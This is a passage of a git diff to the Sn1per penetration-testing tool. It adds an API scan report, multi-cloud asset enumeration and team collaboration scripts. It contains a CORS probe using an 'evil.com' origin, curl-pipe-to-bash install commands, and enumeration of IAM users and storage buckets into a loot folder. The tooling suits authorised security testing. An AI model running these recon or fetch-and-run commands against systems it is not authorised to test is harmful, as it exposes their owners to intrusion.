for CORS misconfigurations + echo -e "${OKBLUE}[*]${RESET} Testing CORS Misconfigurations..." + curl -s -k -I -H "Origin: https://evil.com" -H "Access-Control-Request-Method: GET" "$TARGET" | grep -i "access-control" > "$LOOT_DIR/api/$TARGET/cors-test.txt" + + # Generate API Security Report + generate_api_security_report "$TARGET" + + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED API SECURITY SCAN COMPLETE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + echo "[sn1persecurity.com] •?((¯°·._.• Finished API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi +fi + +# Generate API Security Report +generate_api_security_report() { + local target=$1 + local report_file="$LOOT_DIR/api/$target/api-security-report-$(date +%Y%m%d%H%M).html" + + # Count findings + local total_findings=0 + local critical_findings=$(wc -l < "$LOOT_DIR/api/$target/vulnerabilities-bola.txt" 2>/dev/null) + local exposure_findings=$(wc -l < "$LOOT_DIR/api/$target/vulnerabilities-data-exposure.txt" 2>/dev/null) + total_findings=$((total_findings + critical_findings + exposure_findings)) + + cat > "$report_file" << EOL + + + + API Security Assessment Report - $target + + + +
+

API Security Assessment Report

+

Target: $target | Generated: $(date)

+
+ +
+

Executive Summary

+
+ Total Findings: + $total_findings +
+
+ Critical Findings: + $critical_findings +
+
+ Data Exposure Issues: + $exposure_findings +
+
+ API Endpoints Discovered: + $(wc -l < "$LOOT_DIR/api/$target/endpoints-all.txt" 2>/dev/null || echo "0") +
+
+ +
+

Critical Findings

+ +
+

Broken Object Level Authorization (BOLA)

+ $(if [ -s "$LOOT_DIR/api/$target/vulnerabilities-bola.txt" ]; then + echo "

The following endpoints may be vulnerable to BOLA attacks:

" + echo "
"
+                cat "$LOOT_DIR/api/$target/vulnerabilities-bola.txt"
+                echo "
" + echo "

Remediation: Implement proper authorization checks to ensure users can only access resources they are authorized to access.

" + else + echo "

No BOLA vulnerabilities were identified during testing.

" + fi) +
+ +
+

Excessive Data Exposure

+ $(if [ -s "$LOOT_DIR/api/$target/vulnerabilities-data-exposure.txt" ]; then + echo "

The following endpoints may be exposing sensitive data:

" + echo "
"
+                cat "$LOOT_DIR/api/$target/vulnerabilities-data-exposure.txt"
+                echo "
" + echo "

Remediation: Review and filter sensitive data in API responses. Only return the minimum required data for each endpoint.

" + else + echo "

No excessive data exposure issues were identified during testing.

" + fi) +
+
+ +
+

API Endpoints Discovered

+ $(if [ -s "$LOOT_DIR/api/$target/endpoints-all.txt" ]; then + echo "

Total endpoints discovered: $(wc -l < "$LOOT_DIR/api/$target/endpoints-all.txt")

" + echo "
" + echo "
"
+            head -n 50 "$LOOT_DIR/api/$target/endpoints-all.txt"
+            [ $(wc -l < "$LOOT_DIR/api/$target/endpoints-all.txt") -gt 50 ] && echo "\n... and more (truncated)"
+            echo "
" + echo "
" + echo "

Full list available at: $LOOT_DIR/api/$target/endpoints-all.txt

" + else + echo "

No API endpoints were discovered during testing.

" + fi) +
+ +
+

Security Headers

+ $(if [ -s "$LOOT_DIR/api/$target/security-headers.txt" ]; then + echo "

The following security-related headers were identified:

" + echo "
"
+            cat "$LOOT_DIR/api/$target/security-headers.txt"
+            echo "
" + echo "

Recommendation: Ensure proper security headers are implemented (e.g., Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, etc.).

" + else + echo "

No security headers were identified in the response.

" + fi) +
+ +
+

Recommendations

+
+

General Security Recommendations

+
    +
  • Implement proper authentication and authorization for all API endpoints
    • +
  • Use HTTPS for all API communications
    • +
  • Implement rate limiting to prevent abuse
    • +
  • Validate and sanitize all input data
    • +
  • Implement proper error handling that doesn't leak sensitive information
    • +
  • Regularly update and patch all API dependencies
    • +
  • Implement proper logging and monitoring
    • +
  • Conduct regular security assessments and penetration tests
    • +
+
+
+ +
+ Report generated by Sn1per Professional v$VERSION on $(date) +
+ + +EOL + + echo -e "${OKGREEN}[*]${RESET} API security report generated: $report_file" +} diff --git a/modes/bruteforce.sh b/modes/bruteforce.sh old mode 100644 new mode 100755 diff --git a/modes/cloud-asset-discovery.sh b/modes/cloud-asset-discovery.sh new file mode 100644 index 00000000..1ea85abd --- /dev/null +++ b/modes/cloud-asset-discovery.sh @@ -0,0 +1,212 @@ +#!/bin/bash +# Cloud Asset Discovery Mode +# Author: Sn1per Security Team +# Description: Discovers and enumerates cloud assets across multiple providers + +if [[ "$CLOUD_DISCOVERY" = "1" ]]; then + echo "[sn1persecurity.com] •?((¯°·._.• Started Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + + mkdir -p $LOOT_DIR/cloud/$TARGET + + # AWS Discovery + if [[ "$AWS_DISCOVERY" = "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING AWS ASSETS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Check for AWS CLI and install if not present + if ! command -v aws &> /dev/null; then + echo -e "$OKORANGE[i]$RESET AWS CLI not found. Installing..." + pip3 install awscli --upgrade --user + export PATH=~/.local/bin:$PATH + fi + + # Run AWS recon if credentials are configured + if aws sts get-caller-identity &> /dev/null; then + # List all regions + for region in $(aws ec2 describe-regions --query "Regions[].RegionName" --output text); do + echo -e "${OKBLUE}[*]${RESET} Scanning AWS region: $region" + + # EC2 Instances + echo -e "${OKBLUE}[*]${RESET} Enumerating EC2 instances..." + aws ec2 describe-instances --region $region --query 'Reservations[*].Instances[*].[InstanceId,InstanceType,PrivateIpAddress,PublicIpAddress,State.Name,Tags[?Key==`Name`].Value|[0]]' --output table > $LOOT_DIR/cloud/$TARGET/aws-ec2-$region.txt 2>&1 + + # S3 Buckets + echo -e "${OKBLUE}[*]${RESET} Enumerating S3 buckets..." + aws s3 ls --region $region > $LOOT_DIR/cloud/$TARGET/aws-s3-$region.txt 2>&1 + + # IAM Users and Policies + echo -e "${OKBLUE}[*]${RESET} Enumerating IAM users and policies..." + aws iam list-users > $LOOT_DIR/cloud/$TARGET/aws-iam-users.json 2>&1 + aws iam list-policies --scope Local --output json > $LOOT_DIR/cloud/$TARGET/aws-iam-policies.json 2>&1 + + # Lambda Functions + echo -e "${OKBLUE}[*]${RESET} Enumerating Lambda functions..." + aws lambda list-functions --region $region > $LOOT_DIR/cloud/$TARGET/aws-lambda-$region.json 2>&1 + done + else + echo -e "${OKORANGE}[!]${RESET} AWS CLI not configured. Skipping AWS discovery." + fi + fi + + # Azure Discovery + if [[ "$AZURE_DISCOVERY" = "1" ]]; then + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING AZURE ASSETS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + if command -v az &> /dev/null; then + if az account show &> /dev/null; then + # List all subscriptions + for sub in $(az account list --query "[].id" -o tsv); do + echo -e "${OKBLUE}[*]${RESET} Scanning Azure subscription: $sub" + + # Set subscription + az account set --subscription $sub + + # List VMs + echo -e "${OKBLUE}[*]${RESET} Enumerating virtual machines..." + az vm list --output table > $LOOT_DIR/cloud/$TARGET/azure-vms-$sub.txt 2>&1 + + # List Storage Accounts + echo -e "${OKBLUE}[*]${RESET} Enumerating storage accounts..." + az storage account list --output table > $LOOT_DIR/cloud/$TARGET/azure-storage-$sub.txt 2>&1 + + # List App Services + echo -e "${OKBLUE}[*]${RESET} Enumerating app services..." + az webapp list --output table > $LOOT_DIR/cloud/$TARGET/azure-webapps-$sub.txt 2>&1 + done + else + echo -e "${OKORANGE}[!]${RESET} Azure CLI not logged in. Skipping Azure discovery." + fi + else + echo -e "${OKORANGE}[!]${RESET} Azure CLI not found. Install with: curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash" + fi + fi + + # GCP Discovery + if [[ "$GCP_DISCOVERY" = "1" ]]; then + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING GCP ASSETS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + if command -v gcloud &> /dev/null; then + # List all projects + for project in $(gcloud projects list --format="value(projectId)"); do + echo -e "${OKBLUE}[*]${RESET} Scanning GCP project: $project" + + # Set project + gcloud config set project $project + + # List Compute Instances + echo -e "${OKBLUE}[*]${RESET} Enumerating compute instances..." + gcloud compute instances list > $LOOT_DIR/cloud/$TARGET/gcp-compute-$project.txt 2>&1 + + # List Storage Buckets + echo -e "${OKBLUE}[*]${RESET} Enumerating storage buckets..." + gsutil ls -p $project > $LOOT_DIR/cloud/$TARGET/gcp-storage-$project.txt 2>&1 + + # List Cloud Functions + echo -e "${OKBLUE}[*]${RESET} Enumerating cloud functions..." + gcloud functions list > $LOOT_DIR/cloud/$TARGET/gcp-functions-$project.txt 2>&1 + done + else + echo -e "${OKORANGE}[!]${RESET} Google Cloud SDK not found. Install with: curl https://sdk.cloud.google.com | bash" + fi + fi + + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED CLOUD ASSET DISCOVERY COMPLETE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Generate report + if [[ "$GENERATE_REPORT" = "1" ]]; then + generate_cloud_report "$TARGET" + fi + + echo "[sn1persecurity.com] •?((¯°·._.• Finished Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi +fi + +# Generate cloud discovery report +generate_cloud_report() { + local target=$1 + local report_file="$LOOT_DIR/cloud/$target/cloud-asset-report-$(date +%Y%m%d%H%M).html" + + cat > "$report_file" << EOL + + + + Cloud Asset Discovery Report - $target + + + +
+

Cloud Asset Discovery Report

+

Target: $target | Generated: $(date)

+
+ +
+

Summary

+

Cloud asset discovery performed on $(date) against target $target.

+
+ +
+

Assets Discovered

+
+

AWS Assets

+ 
$(cat $LOOT_DIR/cloud/$target/aws-ec2-*.txt 2>/dev/null || echo "No AWS assets found")
+
+ +
+

Azure Assets

+ 
$(cat $LOOT_DIR/cloud/$target/azure-vms-*.txt 2>/dev/null || echo "No Azure assets found")
+
+ +
+

GCP Assets

+ 
$(cat $LOOT_DIR/cloud/$target/gcp-compute-*.txt 2>/dev/null || echo "No GCP assets found")
+
+
+ +
+

Recommendations

+
+

Security Recommendations

+
    +
  • Review and restrict IAM permissions following the principle of least privilege
    • +
  • Enable logging and monitoring for all cloud resources
    • +
  • Regularly audit and rotate access keys and credentials
    • +
  • Implement network segmentation and security groups
    • +
  • Enable multi-factor authentication for all privileged accounts
    • +
+
+
+ +
+ Report generated by Sn1per Professional v$VERSION on $(date) +
+ + +EOL + + echo -e "${OKGREEN}[*]${RESET} Cloud asset discovery report generated: $report_file" +} diff --git a/modes/collaboration.sh b/modes/collaboration.sh new file mode 100644 index 00000000..f41c4633 --- /dev/null +++ b/modes/collaboration.sh @@ -0,0 +1,866 @@ +#!/bin/bash +# REAL-TIME COLLABORATION FEATURES MODULE ##################################################################################################### +# Advanced real-time collaboration, team coordination, and communication features for Sn1per + +if [[ "$REPORT" = "1" ]]; then + args="-t $TARGET" + if [[ "$OSINT" = "1" ]]; then + args="$args -o" + fi + if [[ "$AUTO_BRUTE" = "1" ]]; then + args="$args -b" + fi + if [[ "$FULLNMAPSCAN" = "1" ]]; then + args="$args -fp" + fi + if [[ "$RECON" = "1" ]]; then + args="$args -re" + fi + if [[ "$MODE" = "collab" ]]; then + args="$args -m collab" + fi + if [[ ! -z "$PORT" ]]; then + args="$args -p $PORT" + fi + if [[ ! -z "$WORKSPACE" ]]; then + args="$args -w $WORKSPACE" + fi + args="$args --noreport" + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[https://sn1persecurity.com" +echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" +echo -e "$OKORANGE + -- --=[Real-Time Collaboration Mode - Team Coordination & Communication" +echo -e "$RESET" + +if [[ ! -z $WORKSPACE ]]; then + LOOT_DIR=$WORKSPACE_DIR +fi + +echo "$TARGET" >> $LOOT_DIR/domains/targets.txt +if [[ "$MODE" = "" ]]; then + MODE="collaboration" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +fi +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2>/dev/null +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2>/dev/null +ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + +echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi + +# Initialize collaboration directories +mkdir -p $LOOT_DIR/collaboration/{team-chat,shared-workspace,progress-tracking,notification-center,report-sharing} 2>/dev/null + +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED INITIALIZING REAL-TIME COLLABORATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# 1. TEAM CHAT SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED TEAM CHAT SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up team chat system..." + +# Create team chat script +cat > $LOOT_DIR/collaboration/team-chat/chat-server.sh << EOF +#!/bin/bash +# Sn1per Team Chat Server + +CHAT_LOG="$LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log" +CHAT_USERS="$LOOT_DIR/collaboration/team-chat/active-users.txt" + +echo "[*] Sn1per Team Chat Server Started" > "$CHAT_LOG" +echo "[*] Target: $TARGET" >> "$CHAT_LOG" +echo "[*] Time: $(date)" >> "$CHAT_LOG" + +# Function to add message to chat +add_message() { + echo "[$TARGET] [\$(whoami)] [\$(date '+%Y-%m-%d %H:%M:%S')] \$1" >> "$CHAT_LOG" + echo "[CHAT] \$1" +} + +# Function to show recent messages +show_recent() { + echo "=== Recent Chat Messages ===" + tail -20 "$CHAT_LOG" 2>/dev/null + echo "===========================" +} + +# Function to add user to active users +add_user() { + echo "\$(whoami) - \$(date '+%Y-%m-%d %H:%M:%S')" >> "$CHAT_USERS" +} + +# Add current user +add_user + +echo "[*] Type 'help' for available commands" +echo "[*] Type 'quit' to exit chat" + +while true; do + read -p "[$TARGET:\$(whoami)] " message + + case \$message in + "quit"|"exit") + echo "[*] Leaving chat..." + break + ;; + "help") + echo "Available commands:" + echo " help - Show this help" + echo " users - Show active users" + echo " recent - Show recent messages" + echo " clear - Clear screen" + echo " status - Show scan status" + echo " findings - Show latest findings" + echo " quit - Exit chat" + ;; + "users") + echo "=== Active Users ===" + cat "$CHAT_USERS" 2>/dev/null + echo "===================" + ;; + "recent") + show_recent + ;; + "clear") + clear + ;; + "status") + echo "=== Scan Status ===" + ls -la $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l + echo "running scans" + echo "==================" + ;; + "findings") + echo "=== Latest Findings ===" + find $LOOT_DIR -name "*.txt" -newermt "1 hour ago" 2>/dev/null | head -5 + echo "=======================" + ;; + "") + # Empty message, do nothing + ;; + *) + add_message "\$message" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/team-chat/chat-server.sh + +# 2. SHARED WORKSPACE SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SHARED WORKSPACE SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up shared workspace..." + +# Create workspace sharing script +cat > $LOOT_DIR/collaboration/shared-workspace/workspace-share.sh << EOF +#!/bin/bash +# Sn1per Workspace Sharing System + +WORKSPACE_DIR="$LOOT_DIR" +TARGET="$TARGET" + +echo "[*] Sn1per Workspace Sharing System" +echo "[*] Workspace: $WORKSPACE_DIR" +echo "[*] Target: $TARGET" + +# Function to share files with team +share_files() { + echo "[*] Sharing files with team members..." + + # Create shared directory + SHARED_DIR="$WORKSPACE_DIR/shared" + mkdir -p "$SHARED_DIR" + + # Copy important findings to shared directory + cp $WORKSPACE_DIR/vuln-analysis/vulnerability-report-$TARGET.txt "$SHARED_DIR/" 2>/dev/null + cp $WORKSPACE_DIR/ml-analysis/ai-analysis-report-$TARGET.txt "$SHARED_DIR/" 2>/dev/null + cp $WORKSPACE_DIR/exploit-framework/exploit-report-$TARGET.txt "$SHARED_DIR/" 2>/dev/null + + echo "[+] Files shared to: $SHARED_DIR" + ls -la "$SHARED_DIR" +} + +# Function to sync with team +sync_with_team() { + echo "[*] Syncing with team workspace..." + + # Check for team updates + if [[ -f "$WORKSPACE_DIR/team-updates.txt" ]]; then + echo "=== Team Updates ===" + cat "$WORKSPACE_DIR/team-updates.txt" + echo "===================" + fi +} + +# Function to create team report +create_team_report() { + echo "[*] Creating team report..." + + REPORT_FILE="$WORKSPACE_DIR/collaboration/team-report-$TARGET.md" + + cat > "$REPORT_FILE" << REPORT_EOF +# Sn1per Team Report - $TARGET +## Generated: $(date) +## Team Members: $(whoami) + +### Executive Summary +- Target: $TARGET +- Scan Status: $(ls $WORKSPACE_DIR/scans/running_*.txt 2>/dev/null | wc -l) scans running +- Total Findings: $(find $WORKSPACE_DIR -name "*.txt" | wc -l) files generated + +### Recent Activities +$(tail -10 $WORKSPACE_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null) + +### Critical Findings +$(grep -r "CRITICAL\|HIGH" $WORKSPACE_DIR/vuln-analysis/ 2>/dev/null | head -5) + +### Recommendations +1. Review all critical findings +2. Coordinate remediation efforts +3. Schedule follow-up scans + +### Team Notes +$(cat $WORKSPACE_DIR/collaboration/team-notes.txt 2>/dev/null) + +--- +*Generated by Sn1per Collaboration System* +REPORT_EOF + + echo "[+] Team report created: $REPORT_FILE" +} + +# Main menu +while true; do + echo "" + echo "=== Workspace Sharing Menu ===" + echo "1. Share files with team" + echo "2. Sync with team" + echo "3. Create team report" + echo "4. Show shared files" + echo "5. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + share_files + ;; + 2) + sync_with_team + ;; + 3) + create_team_report + ;; + 4) + echo "=== Shared Files ===" + ls -la "$WORKSPACE_DIR/shared/" 2>/dev/null + echo "===================" + ;; + 5) + echo "[*] Exiting workspace sharing..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/shared-workspace/workspace-share.sh + +# 3. PROGRESS TRACKING SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED PROGRESS TRACKING SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up progress tracking..." + +# Create progress tracking script +cat > $LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh << EOF +#!/bin/bash +# Sn1per Progress Tracking System + +TARGET="$TARGET" +PROGRESS_FILE="$LOOT_DIR/collaboration/progress-tracking/scan-progress.json" + +# Initialize progress file +if [[ ! -f "$PROGRESS_FILE" ]]; then + cat > "$PROGRESS_FILE" << JSON_EOF +{ + "target": "$TARGET", + "start_time": "$(date -Iseconds)", + "status": "in_progress", + "modules": { + "recon": {"status": "pending", "progress": 0, "eta": "unknown"}, + "vuln_analysis": {"status": "pending", "progress": 0, "eta": "unknown"}, + "ml_analysis": {"status": "pending", "progress": 0, "eta": "unknown"}, + "exploit_framework": {"status": "pending", "progress": 0, "eta": "unknown"}, + "evasion_techniques": {"status": "pending", "progress": 0, "eta": "unknown"} + }, + "overall_progress": 0, + "estimated_completion": "unknown", + "team_members": ["$(whoami)"], + "active_tasks": [] +} +JSON_EOF +fi + +# Function to update progress +update_progress() { + module=\$1 + progress=\$2 + status=\$3 + + # Update JSON file + sed -i "s/\"$module\": {\"status\": \".*\", \"progress\": [0-9]*, \"eta\": \".*\"}/\"$module\": {\"status\": \"$status\", \"progress\": $progress, \"eta\": \"calculating\"}/g" "$PROGRESS_FILE" + + # Calculate overall progress + total_modules=5 + completed_modules=\$(grep -o "\"status\": \"completed\"" "$PROGRESS_FILE" | wc -l) + overall_progress=\$((completed_modules * 100 / total_modules)) + + # Update overall progress + sed -i "s/\"overall_progress\": [0-9]*/\"overall_progress\": $overall_progress/g" "$PROGRESS_FILE" + + echo "[+] Progress updated: $module - $progress% ($status)" +} + +# Function to show progress +show_progress() { + echo "=== Scan Progress for $TARGET ===" + + if [[ -f "$PROGRESS_FILE" ]]; then + echo "Overall Progress: \$(grep -o '"overall_progress": [0-9]*' "$PROGRESS_FILE" | cut -d: -f2)%" + echo "" + echo "Module Status:" + grep -A 1 -B 1 "module" "$PROGRESS_FILE" | grep -E "(module|status|progress)" | sed 's/.*"module": "\([^"]*\)".*/\1:/;s/.*"status": "\([^"]*\)".*/ Status: \1/;s/.*"progress": \([0-9]*\).*/ Progress: \1%/' + fi + + echo "" + echo "Running Tasks:" + ls $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l + echo "tasks running" + + echo "" + echo "Recent Activities:" + tail -5 $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null +} + +# Function to estimate completion time +estimate_completion() { + echo "[*] Estimating completion time..." + + running_tasks=\$(ls $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l) + + if [[ \$running_tasks -gt 0 ]]; then + # Simple estimation based on running tasks + avg_time_per_task=30 # minutes + estimated_minutes=\$((running_tasks * avg_time_per_task)) + estimated_time=\$(date -d "+\$estimated_minutes minutes" '+%Y-%m-%d %H:%M') + + sed -i "s/\"estimated_completion\": \".*\"/\"estimated_completion\": \"$estimated_time\"/g" "$PROGRESS_FILE" + echo "[+] Estimated completion: \$estimated_time" + else + echo "[-] No running tasks to estimate" + fi +} + +# Main progress tracking loop +while true; do + echo "" + echo "=== Progress Tracking Menu ===" + echo "1. Show current progress" + echo "2. Update module progress" + echo "3. Estimate completion time" + echo "4. Mark module complete" + echo "5. Refresh status" + echo "6. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + show_progress + ;; + 2) + echo "Available modules: recon, vuln_analysis, ml_analysis, exploit_framework, evasion_techniques" + read -p "Module name: " module + read -p "Progress (0-100): " progress + read -p "Status (pending/in_progress/completed): " status + update_progress "\$module" "\$progress" "\$status" + ;; + 3) + estimate_completion + ;; + 4) + read -p "Module to mark complete: " module + update_progress "\$module" "100" "completed" + ;; + 5) + echo "[*] Refreshing status..." + show_progress + ;; + 6) + echo "[*] Exiting progress tracker..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh + +# 4. NOTIFICATION CENTER +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED NOTIFICATION CENTER $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up notification center..." + +# Create notification system +cat > $LOOT_DIR/collaboration/notification-center/notification-system.sh << EOF +#!/bin/bash +# Sn1per Notification Center + +TARGET="$TARGET" +NOTIFICATION_LOG="$LOOT_DIR/collaboration/notification-center/notifications.log" + +# Function to send notification +send_notification() { + priority=\$1 + message=\$2 + + echo "[\$(date '+%Y-%m-%d %H:%M:%S')] [\$priority] \$message" >> "$NOTIFICATION_LOG" + + # Send to Slack if configured + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[\$priority] \$message" + fi + + # Display notification + case \$priority in + "CRITICAL") + echo -e "$OKRED[CRITICAL] \$message$RESET" + ;; + "HIGH") + echo -e "$OKORANGE[HIGH] \$message$RESET" + ;; + "MEDIUM") + echo -e "$OKYELLOW[MEDIUM] \$message$RESET" + ;; + "LOW") + echo -e "$OKBLUE[LOW] \$message$RESET" + ;; + "INFO") + echo -e "$OKGREEN[INFO] \$message$RESET" + ;; + esac +} + +# Function to show notifications +show_notifications() { + echo "=== Recent Notifications ===" + tail -20 "$NOTIFICATION_LOG" 2>/dev/null + echo "===========================" +} + +# Function to filter notifications +filter_notifications() { + priority=\$1 + echo "=== \$priority Priority Notifications ===" + grep "\[$priority\]" "$NOTIFICATION_LOG" 2>/dev/null | tail -10 + echo "====================================" +} + +# Function to send critical finding notification +notify_critical_finding() { + finding=\$1 + send_notification "CRITICAL" "Critical finding detected: \$finding" +} + +# Function to send progress update +notify_progress_update() { + module=\$1 + progress=\$2 + send_notification "INFO" "Progress update: \$module - \$progress% complete" +} + +# Function to send scan completion +notify_scan_complete() { + scan_type=\$1 + send_notification "HIGH" "Scan completed: \$scan_type for $TARGET" +} + +# Main notification menu +while true; do + echo "" + echo "=== Notification Center ===" + echo "1. Show all notifications" + echo "2. Show critical notifications" + echo "3. Show high priority notifications" + echo "4. Show medium priority notifications" + echo "5. Send test notification" + echo "6. Clear notifications" + echo "7. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + show_notifications + ;; + 2) + filter_notifications "CRITICAL" + ;; + 3) + filter_notifications "HIGH" + ;; + 4) + filter_notifications "MEDIUM" + ;; + 5) + read -p "Priority (CRITICAL/HIGH/MEDIUM/LOW/INFO): " priority + read -p "Message: " message + send_notification "\$priority" "\$message" + ;; + 6) + echo "[*] Clearing notifications..." + > "$NOTIFICATION_LOG" + ;; + 7) + echo "[*] Exiting notification center..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/notification-center/notification-system.sh + +# 5. REPORT SHARING SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED REPORT SHARING SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up report sharing..." + +# Create report sharing script +cat > $LOOT_DIR/collaboration/report-sharing/report-share.sh << EOF +#!/bin/bash +# Sn1per Report Sharing System + +TARGET="$TARGET" +SHARED_DIR="$LOOT_DIR/shared" + +# 